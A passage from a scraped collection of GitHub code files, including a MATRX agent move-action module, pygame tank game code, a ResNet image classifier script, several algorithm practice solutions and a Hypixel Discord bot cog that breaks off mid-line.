0\n","repo_name":"neadan/amazon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17730059480","text":"from matrxs.actions.action import Action, ActionResult\nfrom matrxs.objects.agent_body import AgentBody\n\n\n# Custom move actions that cost energy\n\ndef act_move(grid_world, agent_id, dx, dy):\n agent_avatar = grid_world.get_env_object(agent_id, obj_type=AgentBody)\n loc = agent_avatar.location\n new_loc = [loc[0] + dx, loc[1] + dy]\n grid_world.registered_agents[agent_id].location = new_loc\n\n # A move action costs energy\n custom_properties = grid_world.registered_agents[agent_id].custom_properties\n energy = custom_properties['energy']\n energy_cost_move = grid_world.environment_objects['settings'].properties['energy_cost_move']\n energy_new = energy - energy_cost_move\n custom_properties['energy'] = energy_new\n grid_world.registered_agents[agent_id].change_property('custom_properties', custom_properties)\n\n return MoveActionResult(MoveActionResult.RESULT_SUCCESS, succeeded=True)\n\n\ndef is_possible_movement(grid_world, agent_id, dx, dy):\n energy = grid_world.registered_agents[agent_id].custom_properties['energy']\n energy_cost_move = 
grid_world.environment_objects['settings'].properties['energy_cost_move']\n if energy > energy_cost_move:\n return possible_movement(grid_world, agent_id, dx, dy)\n else:\n return MoveActionResult(MoveActionResult.RESULT_NOT_ENOUGH_ENERGY, succeeded=False)\n\n\ndef possible_movement(grid_world, agent_id, dx, dy):\n\n agent_avatar = grid_world.get_env_object(agent_id, obj_type=AgentBody)\n assert agent_avatar is not None\n\n loc = agent_avatar.location\n new_loc = [loc[0] + dx, loc[1] + dy]\n if 0 <= new_loc[0] < grid_world.shape[0] and 0 <= new_loc[1] < grid_world.shape[1]:\n loc_obj_ids = grid_world.grid[new_loc[1], new_loc[0]]\n if loc_obj_ids is None:\n # there is nothing at that location\n return MoveActionResult(MoveActionResult.RESULT_SUCCESS, succeeded=True)\n else:\n # Go through all objects at the desired location\n for loc_obj_id in loc_obj_ids:\n # Check if loc_obj_id is the id of an agent\n if loc_obj_id in grid_world.registered_agents.keys():\n # get the actual agent\n loc_obj = grid_world.registered_agents[loc_obj_id]\n # Check whether the agent that takes the move action is itself already at that\n # location (meaning that for some reason the move action has no effect). If this\n # is the case, we send the appropriate result\n if loc_obj_id == agent_id:\n # The desired location already contains the acting agent, so the move has no effect\n return MoveActionResult(MoveActionResult.RESULT_NO_MOVE, succeeded=False)\n # Check if the agent at the other location (if not itself) is traversable. Otherwise we\n # return that the location is occupied.\n elif not loc_obj.is_traversable:\n return MoveActionResult(MoveActionResult.RESULT_OCCUPIED, succeeded=False)\n # If there are no agents at the desired location or we can move on top of other agents, we check if\n # there are objects in the way that are not passable.\n if loc_obj_id in grid_world.environment_objects.keys():\n # get the actual object\n loc_obj = grid_world.environment_objects[loc_obj_id]\n # Check if the object is passable; if it is not, is_traversable is False\n if not loc_obj.is_traversable:\n # The desired location contains an object that is not passable\n return MoveActionResult(MoveActionResult.RESULT_NOT_PASSABLE_OBJECT, succeeded=False)\n\n # Either the desired location contains the agent at previous tick, and/or all objects there are passable\n return MoveActionResult(MoveActionResult.RESULT_SUCCESS, succeeded=True)\n else:\n return MoveActionResult(MoveActionResult.RESULT_OUT_OF_BOUNDS, succeeded=False)\n\n\nclass MoveActionResult(ActionResult):\n RESULT_NO_MOVE = 'Move action resulted in a new location with the agent already present.'\n RESULT_SUCCESS = 'Move action success'\n RESULT_OUT_OF_BOUNDS = 'Move action out of bounds'\n RESULT_OCCUPIED = 'Move action towards occupied space'\n RESULT_NOT_PASSABLE_OBJECT = 'Move action toward space which is not traversable by agent due to object'\n RESULT_NOT_ENOUGH_ENERGY = 'Not enough energy to perform move action'\n\n def __init__(self, result, succeeded):\n super().__init__(result, succeeded)\n\n\nclass Move(Action):\n def __init__(self, duration_in_ticks=0):\n super().__init__(duration_in_ticks)\n self.dx = 0\n self.dy = 0\n\n def is_possible(self, grid_world, agent_id, **kwargs):\n result = is_possible_movement(grid_world, agent_id=agent_id, dx=self.dx, dy=self.dy)\n return result\n\n def mutate(self, grid_world, agent_id, **kwargs):\n return act_move(grid_world, agent_id=agent_id, dx=self.dx, dy=self.dy)\n\n\nclass MoveNorth2(Move):\n def 
__init__(self):\n super().__init__()\n self.dx = 0\n self.dy = -1\n\n\nclass MoveEast2(Move):\n\n def __init__(self):\n super().__init__()\n self.dx = +1\n self.dy = 0\n\n\nclass MoveSouth2(Move):\n\n def __init__(self):\n super().__init__()\n self.dx = 0\n self.dy = +1\n\n\nclass MoveWest2(Move):\n\n def __init__(self):\n super().__init__()\n self.dx = -1\n self.dy = 0\n","repo_name":"matrx-software/USAR-Testbed-for-Human-Agent-Teaming","sub_path":"aims/move_actions_explorer.py","file_name":"move_actions_explorer.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11412933338","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.3'\n# jupytext_version: 0.8.5\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# language_info:\n# codemirror_mode:\n# name: ipython\n# version: 3\n# file_extension: .py\n# mimetype: text/x-python\n# name: python\n# nbconvert_exporter: python\n# pygments_lexer: ipython3\n# version: 3.6.7\n# ---\n\nimport pandas as pd\nimport scanpy.api as sc\nfrom anndata import AnnData\nimport os.path\nimport sys\nsys.path.append(\"lib\")\nfrom scio import check_obs, check_var\n\nDATASET = \"zheng_bileas_2017\"\nCOUNT_FILE = \"data/{}/\".format(DATASET)\nOUTPUT_DIR = \"results/data_processed/{}/\".format(DATASET)\n\nadata = sc.read_10x_mtx(COUNT_FILE, var_names=\"gene_symbols\")\n\nadata.obs = adata.obs.assign(samples = \"1\")\\\n .assign(patient = \"1\")\\\n .assign(origin = \"blood_peripheral\")\\\n .assign(replicate = \"1\")\\\n .assign(platform = \"10x_3p_v2\")\\\n .assign(tumor_type = \"PBMC\")\n\nadata.obs[\"dataset\"] = DATASET\n\ncheck_obs(adata)\ncheck_var(adata)\n\nadata.write(os.path.join(OUTPUT_DIR, \"adata.h5ad\"), compression='lzf')\n","repo_name":"grst/single_cell_data_integration","sub_path":"pipeline_stages/01_process_counts/zheng_bileas_2017.py","file_name":"zheng_bileas_2017.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9621753799","text":"# 센서\n\nn = int(input())\nk = int(input())\nsensors = list(map(int, input().split()))\nsensors.sort()\ndist = []\nfor i in range(len(sensors)-1):\n dist.append(abs(sensors[i]-sensors[i+1]))\ndist.sort()\n\nif k >= n:\n print(0)\nelse:\n for _ in range(k-1):\n dist.pop()\n print(sum(dist))","repo_name":"niinp28/algorithm","sub_path":"BOJ/BOJ2212.py","file_name":"BOJ2212.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18518401553","text":"class Solution:\n # @param A : list of integers\n # @return an integer\n def solve(self, A):\n A.sort()\n print(A)\n\n count = 0\n n = len(A)\n for i in range(n):\n if A[i] == n - i - 1:\n count += 1\n\n return count if count else -1\n\n # A.sort()\n #\n # current = counter = 0\n #\n # if A[0] == 0:\n # counter += 1\n #\n # for i in range(1, len(A)):\n # if A[i] != A[i - 1]:\n # current += 1\n #\n # if current == A[i]:\n # counter += 1\n #\n # return counter if counter else -1\n\n\nif __name__ == '__main__':\n # A = [3, 2, 1, 3]\n # A = [1, 1, 3, 3]\n # A = [2, 4, 5, 6, 7, 8]\n A = [9, 8, 4, 5, 7, 4]\n\n print(Solution().solve(A))\n","repo_name":"vinay-yadav/Introduction_To_DSA","sub_path":"4. Sorting/2. Noble Integer.py","file_name":"2. 
Noble Integer.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2366818329","text":"from sys import stdin as s\nfrom collections import deque\n\n#1. For each node, store the list of nodes reachable from it in the graph array\n#2. Create an empty visited array to track whether each node was visited, and a go_list array holding the minimum distance to each node\n#3. Traverse using BFS\n#3-1. Put the start node into the queue and mark it as visited\n#3-2. Pop a node from the queue, then push every unvisited adjacent node into the queue and mark it visited; since we moved along one edge, store the current node's distance plus 1 for the adjacent node (go_list)\n#3-3. Repeat until step 3-2 can no longer be performed\ns=open(\"input.txt\",\"rt\")\n\n\ndef bfs(graph,start,visited,k):\n \n queue = deque()\n queue.append(start) # put the start value into the queue\n while queue:\n v= queue.popleft()\n visited[start]=True # mark as visited\n for i in graph[v]: \n if not visited[i]: # if the node has not been visited yet\n queue.append(i) # add the node to the queue\n visited[i]=True # mark it as visited, then\n go_list[i] = go_list[v]+1 # store the distance increased by one edge\n\n \n\nn,m,k,x = map(int,s.readline().split()) # n: cities, m: edges, k: target shortest distance, x: start city\nlist1 =[]\ngraph=[[] for _ in range(n+1)]\nvisited = [False]*(n+1) # tracks whether each node was visited\ngo_list = [0 for _ in range(n+1)] # stores the distance to each node\n# read the reachable cities and fill the graph array in order (1, 2, 3, 4, ...)\nfor i in range(m):\n a,b=map(int,s.readline().split())\n graph[a].append(b)\n graph[a].sort()\nbfs(graph,x,visited,k)\n \n\nprint(go_list)\n \ncount=0 # count the nodes whose distance equals k; if count is still 0 after the loop, print -1\nfor i in range(1,n+1):\n if go_list[i]==k:\n print(i)\n count+=1\nif count ==0:\n print(-1) \n ","repo_name":"heekyoung2000/jungle-algorithm","sub_path":"third/BFS/18352.py","file_name":"18352.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17672531056","text":"# -*- coding: utf-8 -*-\n\nif __name__ ==\"__main__\":\n # Defining some variables\n # integers\n int_1 = 131\n int_2 = 22\n \n # floats\n float_1 = 42.1\n float_2 = .234\n \n # complex\n complex_1 = 1j\n complex_2 = 11. 
+ 42.2j \n \n # booleans\n is_true = True\n is_false = False\n \n # Some operations\n sum_int_int = int_1 + int_2\n sum_int_float = int_1 + float_1\n \n multiply_complex_float = complex_2 * float_1\n multiply_complex_complex = complex_1 * complex_2\n complex_pow_two = complex_1 ** 2\n \n boolean_op_1 = is_true == 1\n boolean_op_2 = is_true != is_false\n boolean_op_3 = is_false == 0\n \n # printing results\n print(\"Sum, integer + integer: %i\" % sum_int_int)\n print(\"Sum, integer + float: %f is float\" % sum_int_float)\n print(\"Mul, complex * float: Real {0.real:.2f} and imag {0.imag:.2f}\".format(multiply_complex_float))\n print(\"Mul, complex * complex: Real {0.real:.2f} and imag {0.imag:.2f}\".format(multiply_complex_complex))\n print(\"Pow, complex ** 2: Real {0.real:.2f} and imag {0.imag:.2f}\".format(complex_pow_two))\n print(\"Boolean operation 1, True == 1: {0}\".format(boolean_op_1))\n print(\"Boolean operation 2, True != False: {0}\".format(boolean_op_2))\n print(\"Boolean operation 3, False == 0: {0}\".format(boolean_op_3))","repo_name":"ovainola/python_kurssi","sub_path":"esimerkit/Basics/1_numerot.py","file_name":"1_numerot.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22281932220","text":"# Enemy (computer-controlled) tank class\n\nimport pygame\nimport random\nimport Tank\nfrom pgzero.actor import Actor\nimport Explosion\n\npygame.init()\nHEIGHT, WIDTH = 600, 800\nSIZE_TANK = 25\n\nclass Tank_enemy(Tank.Tank): # inherits from the base Tank class\n def __init__(self, image, x, y, angle): # (tank image, position (x, y), direction)\n super().__init__(image, x, y, angle)\n self.count = 0 # number of movement steps\n self.explosion_wall_list = [] # list of wall explosions created by this tank\n \n def move(self, wall_list): # movement function\n original_x, original_y = self.x, self.y\n self.count -= 1\n if self.angle == 0:\n self.x += 1\n elif self.angle == 90:\n self.y -= 1\n elif self.angle == 180:\n self.x -= 1\n elif self.angle == 270:\n self.y += 1\n if self.x < SIZE_TANK or self.y < SIZE_TANK or self.x > WIDTH - SIZE_TANK or self.y > HEIGHT - SIZE_TANK: # keep the tank on screen\n self.x, self.y = original_x, original_y\n self.count = 0\n if self.collidelist(wall_list) != -1: # keep the tank from driving through walls\n self.x, self.y = original_x, original_y\n self.count = 0\n \n def set_count(self): # reset the tank's movement steps\n self.count = 30\n\n def set_angle(self): # reset the tank's direction\n self.angle = random.randint(0, 3) * 90\n\n def add_bullet(self, hold_off): # add a bullet to the bullet list\n if self.hold_off == 0:\n bullet = Actor('bulletred2')\n bullet.pos = self.pos\n bullet.angle = self.angle\n if bullet.angle == 0:\n bullet.x += SIZE_TANK\n elif bullet.angle == 90:\n bullet.y -= SIZE_TANK\n elif bullet.angle == 180:\n bullet.x -= SIZE_TANK\n elif bullet.angle == 270:\n bullet.y += SIZE_TANK\n self.bullet_list.append(bullet)\n self.hold_off = max(10, 30 - hold_off) # lets the level-based mode reload faster or slower\n else:\n self.hold_off -= 1\n\n def bullet_wall(self, wall_list): # check whether a bullet hit a wall\n for bullet in self.bullet_list[:]: # iterate over a copy: bullets may be removed below\n wall_index = bullet.collidelist(wall_list) \n if wall_index != -1:\n # wall explosion\n self.explosion_wall_list.append(Explosion.Explosion('images/explosion4.png', \n (wall_list[wall_index].x - SIZE_TANK, wall_list[wall_index].y - SIZE_TANK)))\n wall_list.pop(wall_index)\n pygame.mixer.Sound('sounds/gun10.wav').play()\n self.bullet_list.remove(bullet)\n\n def bullet_tank(self, tank, 
status): # check whether the enemy hit the player's tank\n for bullet in self.bullet_list:\n if bullet.colliderect(tank): \n status.loss = True \n pygame.mixer.Sound('sounds/gun10.wav').play()\n\n def upd(self, wall_list, tank, speed, hold_off, status): # update function\n choice = random.randint(0, 2)\n if self.count > 0: # move\n self.move(wall_list)\n elif choice == 0: # reset the step count\n self.set_count()\n elif choice == 1: # reset the direction\n self.set_angle()\n elif choice == 2: # add a bullet to the list\n self.add_bullet(hold_off)\n super().set_bullet(speed) # fire the bullets\n self.bullet_tank(tank, status) # enemy hit the player\n self.bullet_wall(wall_list) # enemy hit a wall\n\n def draw(self):\n super().draw()","repo_name":"NNovember-rain/TANK_PYTHON","sub_path":"Tank_enemy.py","file_name":"Tank_enemy.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27291338816","text":"# Students are numbered in order of body size, so a student can lend gym clothes only to the student whose number is directly before or after theirs.\n\n# Given the total number of students n, an array lost with the numbers of students whose gym clothes were stolen, and an array reserve with the numbers of students who brought a spare set, write the solution function so that it returns the maximum number of students who can attend the PE class.\n\n# A student who brought a spare set may have had their own set stolen. => If a number appears in both lost and reserve, remove it from both.\n\ndef solution(n, lost, reserve):\n \n # A student who brought a spare set may have had their own set stolen.\n # Exclude those via set difference\n reserve_set = set(reserve) - set(lost)\n lost_set = set(lost) - set(reserve)\n \n for i in reserve_set:\n if i-1 in lost_set:\n lost_set.remove(i-1)\n elif i+1 in lost_set:\n lost_set.remove(i+1)\n \n answer = n - len(lost_set)\n \n return answer","repo_name":"jeongjae96/Coding_Test_Preparation","sub_path":"Programmers/코딩테스트 고득점 Kit/level 1/탐욕법/체육복.py","file_name":"체육복.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7021753042","text":"incorr_list = []\ndictionary = ['all', 'an', 'and', 'as', 'closely', 'correct', 'equivocal', 'examine', 'indication', 'is', 'means', 'minutely', 'or', 'scrutinize', 'sign', 'the', 'to', 'uncertain']\n\nsent = input()\nsent = sent.split()\n\nfor word in sent:\n if word not in dictionary:\n incorr_list.append(word)\n\nif len(incorr_list) == 0:\n print(\"OK\")\nelse:\n print(\"\\n\".join(incorr_list))\n","repo_name":"javampishu/TicTacToe","sub_path":"Problems/Spellchecker/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70725505653","text":"from aiogram import types\nfrom aiogram.filters import BaseFilter, IS_ADMIN\n\n\nclass IsAdminFilter(BaseFilter):\n key = \"is_admin\"\n\n def __init__(self, is_admin: bool):\n self.is_admin = is_admin\n\n async def __call__(self, message: types.Message):\n member = await message.bot.get_chat_member(message.chat.id, message.from_user.id)\n return IS_ADMIN.check(member=member)\n\n\n","repo_name":"mrFrok/Bot_Glavkom_Gestapo","sub_path":"filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30491725970","text":"import os\nimport json\n\nimport torch\nimport torch.nn as nn\nfrom PIL import Image\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\n\nfrom resnet import resnet34\n\n# choose the class you want to search for\nclass_name = 'cat'\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n# transform pipeline\ndata_transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n# load the label-index dictionary from json\njson_path = './class_indices.json'\nassert os.path.exists(json_path), \"file: '{}' does not exist.\".format(json_path)\nwith open(json_path, \"r\") as f:\n class_indict = json.load(f)\n\n# folder of images to test\ntest_img_path = '../data/processed_data/test'\n# this folder stores the images that were found\npick_out_path = './{}_pictures_you_want'.format(class_name)\nif not os.path.exists(pick_out_path):\n os.mkdir(pick_out_path)\n\n# start searching for images\nfind_num = 0\ntest_imglist = os.listdir(test_img_path)\nfor index in range(len(test_imglist)):\n img1 = Image.open(os.path.join(test_img_path, test_imglist[index]))\n # [N, C, H, W]\n img = data_transform(img1)\n # add a batch dimension\n img = torch.unsqueeze(img, dim=0)\n\n # choose the model\n net = resnet34()\n in_channel = net.fc.in_features\n net.fc = nn.Sequential(\n nn.Linear(in_channel, 100, bias=True),\n nn.ReLU(),\n nn.Linear(100, 20, bias=True),\n )\n net.to(device)\n # load the trained model weights\n weights_path = \"./best_resNet34.pth\"\n assert os.path.exists(weights_path), \"file: '{}' does not exist.\".format(weights_path)\n net.load_state_dict(torch.load(weights_path, map_location=device))\n\n # predict the image\n net.eval()\n with torch.no_grad():\n output = torch.squeeze(net(img.to(device))).cpu()\n predict = torch.softmax(output, dim=0)\n predict_cla = torch.argmax(predict).numpy()\n\n\n # show the image\n plt.ion()\n plt.imshow(img1)\n print_res = \"class: {} prob: {:.3}\".format(class_indict[str(predict_cla)],\n predict[predict_cla].numpy())\n plt.title(print_res)\n plt.pause(1)\n plt.close()\n\n # print the image name\n print('\\n----------------------------------'\n '\\n{}/{}'\n '\\n{}'.format(index, len(test_imglist), test_imglist[index]))\n\n # print the predicted probability of each class, sorted in descending order\n predict_list = []\n for i in range(len(predict)):\n print(\"class: {:10} prob: {:.3}\".format(class_indict[str(i)],\n predict[i].numpy()))\n predict_list.append(predict[i].numpy())\n predict_list.sort()\n predict_list.reverse()\n # if the predicted class matches the requested class and its probability exceeds 1.5x the second-highest, save the image to the target folder\n if class_indict[str(predict_cla)] == class_name and predict_list[0] > 1.5*predict_list[1]:\n find_num = find_num + 1\n img1.save(os.path.join(pick_out_path, test_imglist[index]))\n print('\\nHave saved image: {} to {}' .format(test_imglist[index], pick_out_path))\n print('have found {} pictures' .format(find_num))\n if index == len(test_imglist) - 1:\n print('Finish search!')\n","repo_name":"Mingrui-Huang/datamining","sub_path":"课程作业/大作业/代码/voc2012_resnet/images_mining.py","file_name":"images_mining.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33846088717","text":"class Solution(object):\n def networkDelayTime(self, times, N, K):\n \"\"\"\n :type times: List[List[int]]\n :type N: int\n :type K: int\n :rtype: int\n \"\"\"\n from collections import defaultdict\n graph = defaultdict(list)\n for u, v, w in times:\n graph[u].append((w, v))\n\n dist = [float(\"inf\")] * (N + 1)\n\n def dfs(node, elapsed):\n if elapsed >= dist[node]:\n return\n dist[node] = elapsed\n for time, nei in sorted(graph[node]):\n dfs(nei, elapsed + time)\n\n dfs(K, 0)\n res = max(dist[1:])\n\n if res < float(\"inf\"):\n return res\n return -1\n\n\nif __name__ == \"__main__\":\n # times = [[3, 5, 78], [2, 1, 1], [1, 3, 0], [4, 3, 59], [5, 3, 85], [5, 2, 22], [2, 4, 23], [1, 4, 43], [4, 5, 75],\n # [5, 1, 
15], [1, 5, 91], [4, 1, 16], [3, 2, 98], [3, 4, 22], [5, 4, 31], [1, 2, 0], [2, 5, 4], [4, 2, 51],\n # [3, 1, 36], [2, 3, 59]]\n # N = 5\n # K = 5\n\n times = [[2, 1, 1], [2, 3, 1], [3, 4, 1]]\n N = 4\n K = 2\n print(Solution().networkDelayTime(times, N, K))\n","repo_name":"simplynaive/LeetCode","sub_path":"743. Network Delay Time.py","file_name":"743. Network Delay Time.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39066638967","text":"# Script for applying media pipe in videos\n\nfrom mediapipe import solutions\nfrom mediapipe.framework.formats import landmark_pb2\nimport mediapipe as mp\nfrom mediapipe.tasks import python\nfrom mediapipe.tasks.python import vision\n\nimport numpy as np\nimport cv2\n\ndef draw_landmarks_on_image(rgb_image, detection_result):\n pose_landmarks_list = detection_result.pose_landmarks\n annotated_image = np.copy(rgb_image)\n \n # Loop through the detected poses to visualize.\n for idx in range(len(pose_landmarks_list)):\n pose_landmarks = pose_landmarks_list[idx]\n\n # Draw the pose landmarks.\n pose_landmarks_proto = landmark_pb2.NormalizedLandmarkList()\n pose_landmarks_proto.landmark.extend([\n landmark_pb2.NormalizedLandmark(x=landmark.x, y=landmark.y, z=landmark.z) for landmark in pose_landmarks\n ])\n solutions.drawing_utils.draw_landmarks(\n annotated_image,\n pose_landmarks_proto,\n solutions.pose.POSE_CONNECTIONS,\n solutions.drawing_styles.get_default_pose_landmarks_style())\n return annotated_image\n\nif __name__ == '__main__':\n \n # Configure model\n base_options = python.BaseOptions(model_asset_path='../../models/pose_landmarker_heavy.task')\n options = vision.PoseLandmarkerOptions(base_options=base_options,output_segmentation_masks=True)\n detector = vision.PoseLandmarker.create_from_options(options)\n\n # Open Video capture\n cap = cv2.VideoCapture(0)\n\n while cap.isOpened():\n ret, img = cap.read()\n\n #image = mp.Image.create_from_file(\"../data/image.jpg\")\n #mp_image = mp.Image(image_format=mp.ImageFormat.SRGB, data=img)\n #detection_result = detector.detect(mp_image)\n #annotated_image = draw_landmarks_on_image(mp_image.numpy_view(), detection_result)\n \n #cv2.imshow(\"resultado\",annotated_image)\n cv2.imshow(\"imagen\", img)\n k = cv2.waitKey(25)\n if (k & 0xFF)==ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()","repo_name":"AlejandroMaldoRam/mediapipe-test","sub_path":"scripts/pose-detection/test-mediapipe-video.py","file_name":"test-mediapipe-video.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70439520373","text":"import json,sys\r\ndef get_date(time):\r\n with open('record.json','r',newline='') as f:\r\n data = json.load(f)\r\n cnt = 0\r\n try:\r\n for i in data[time]:\r\n if(data[time][i] == True):\r\n cnt += 1\r\n print(cnt)\r\n except:\r\n print(0)\r\n\r\nif __name__ == \"__main__\":\r\n time = sys.argv[1]\r\n get_date(time)","repo_name":"Koios1143/TFCIS_order_system","sub_path":"attach_data.py","file_name":"attach_data.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4848195469","text":"import datetime\n\nfrom hypixel.utils.functions import *\n\n\nclass CrazyWalls(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.utils = utils(self.bot)\n\n @commands.command(hidden=True, 
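The network-delay record above uses a pruned DFS; a standard heap-based Dijkstra with the same input format (an alternative sketch, not the record's code):

import heapq
from collections import defaultdict

def network_delay_time(times, n, k):
    graph = defaultdict(list)
    for u, v, w in times:
        graph[u].append((v, w))
    dist = {}
    heap = [(0, k)]
    while heap:
        d, node = heapq.heappop(heap)
        if node in dist:          # already settled with a shorter time
            continue
        dist[node] = d
        for nei, w in graph[node]:
            if nei not in dist:
                heapq.heappush(heap, (d + w, nei))
    return max(dist.values()) if len(dist) == n else -1

assert network_delay_time([[2, 1, 1], [2, 3, 1], [3, 4, 1]], 4, 2) == 2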
enabled=False)\n async def HiddenCrazyWalls(self, ctx, user):\n start = datetime.datetime.now()\n player = await self.utils.findUser(ctx, user)\n if type(player) != Player: return\n playerJSON = player.JSON\n if \"stats\" not in playerJSON or \"TrueCombat\" not in playerJSON[\"stats\"] or len(playerJSON['stats']['TrueCombat']) < 5: return await ctx.send(f\"Doesn't look like `{player.getName()}` has played Crazy Walls before.\")\n embeds = self.CrazyWalls(player)\n time_taken = datetime.datetime.now() - start\n logging.info(f'{ctx.message.content} - {time_taken.total_seconds()}s [{ctx.message.author.id}]')\n await self.utils.send(ctx, embeds = embeds)\n await self.utils._discord_account(ctx, playerJSON, player.getRank()[\"rank\"])\n\n def CrazyWalls(self, player):\n playerJSON = player.JSON\n playerRank = player.getRank()\n playerName = player.getName()\n playerSession = player.getSession()\n onlineStatus = player.getOnlineStatus()\n playerTC = playerJSON[\"stats\"][\"TrueCombat\"]\n if playerRank[\"rank\"] == 'Youtuber':\n colour = self.utils.rank[\"RED\"][0]\n elif \"rankPlusColor\" in playerJSON:\n colour = self.utils.rank[playerJSON[\"rankPlusColor\"]][0]\n else:\n colour = 0x55FFFF\n if playerSession and 'gameType' in playerSession:\n footer = f'Currently in a {playerSession[\"gameType\"].title()} game'; onlineStatus = True\n else:\n footer = self.bot.footer\n if onlineStatus:\n footer_url = 'https://image.ibb.co/h9VNfq/image.png'\n else:\n footer_url = 'https://image.ibb.co/hwheRV/image.png'\n embeds = {}\n emb = {\n 'embed': {\n 'title': f'{\"[\" + playerRank[\"prefix\"] + \"]\" if playerRank[\"prefix\"] else \"[\" + playerRank[\"rank\"] + \"]\"} {playerName}' if playerRank[\"rank\"] != 'Non' else playerName,\n 'url': f'https://hypixel.net/player/{playerName}',\n 'description': '',\n 'color': colour\n },\n 'footer': {\n 'text': footer,\n 'icon_url': footer_url\n },\n 'thumbnail': 'https://image.ibb.co/fdaKBV/BUgpGKB.png',\n 'pages': {\n '0': [\n {'description': 'Crazy Walls - **Overall**'},\n {'name': 'Coins', 'value': f'{playerTC[\"coins\"] if \"coins\" in playerTC else 0:,}'},\n {'name': 'Win Streak', 'value': playerTC[\"win_streak\"] if 'win_streak' in playerTC else 0},\n {'name': 'Kills', 'value': playerTC[\"kills\"] if 'kills' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"deaths\"] if 'deaths' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"wins\"] if 'wins' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"losses\"] if 'losses' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"kills\"] if \"kills\" in playerTC else 0) / int(playerTC[\"deaths\"] if \"deaths\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': f'{int(playerTC[\"wins\"] if \"wins\" in playerTC else 0) / int(playerTC[\"losses\"] if \"losses\" in playerTC else 1):.2f}'},\n ],\n '1': [\n {'description': 'Crazy Walls - **Solo Normal**'},\n {'name': 'Kills', 'value': playerTC[\"crazywalls_kills_solo\"] if 'crazywalls_kills_solo' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"crazywalls_deaths_solo\"] if 'crazywalls_deaths_solo' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"crazywalls_wins_solo\"] if 'crazywalls_wins_solo' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"crazywalls_losses_solo\"] if 'crazywalls_losses_solo' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"crazywalls_kills_solo\"] if \"crazywalls_kills_solo\" in playerTC else 0) / int(playerTC[\"crazywalls_deaths_solo\"] if 
\"crazywalls_deaths_solo\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': f'{int(playerTC[\"crazywalls_wins_solo\"] if \"crazywalls_wins_solo\" in playerTC else 0) / int(playerTC[\"crazywalls_losses_solo\"] if \"crazywalls_losses_solo\" in playerTC else 1):.2f}'},\n ],\n '2': [\n {'description': 'Crazy Walls - **Solo Lucky**'},\n {'name': 'Kills', 'value': playerTC[\"crazywalls_kills_solo_chaos\"] if 'crazywalls_kills_solo_chaos' in playerTC else 0},\n {'name': 'Deaths', 'value': playerTC[\"crazywalls_deaths_solo_chaos\"] if 'crazywalls_deaths_solo_chaos' in playerTC else 0},\n {'name': 'Wins', 'value': playerTC[\"crazywalls_wins_solo_chaos\"] if 'crazywalls_wins_solo_chaos' in playerTC else 0},\n {'name': 'Losses', 'value': playerTC[\"crazywalls_losses_solo_chaos\"] if 'crazywalls_losses_solo_chaos' in playerTC else 0},\n {'name': 'KDR', 'value': f'{int(playerTC[\"crazywalls_kills_solo_chaos\"] if \"crazywalls_kills_solo_chaos\" in playerTC else 0) / int(playerTC[\"crazywalls_deaths_solo_chaos\"] if \"crazywalls_deaths_solo_chaos\" in playerTC else 1):.2f}'},\n {'name': 'WLR', 'value': 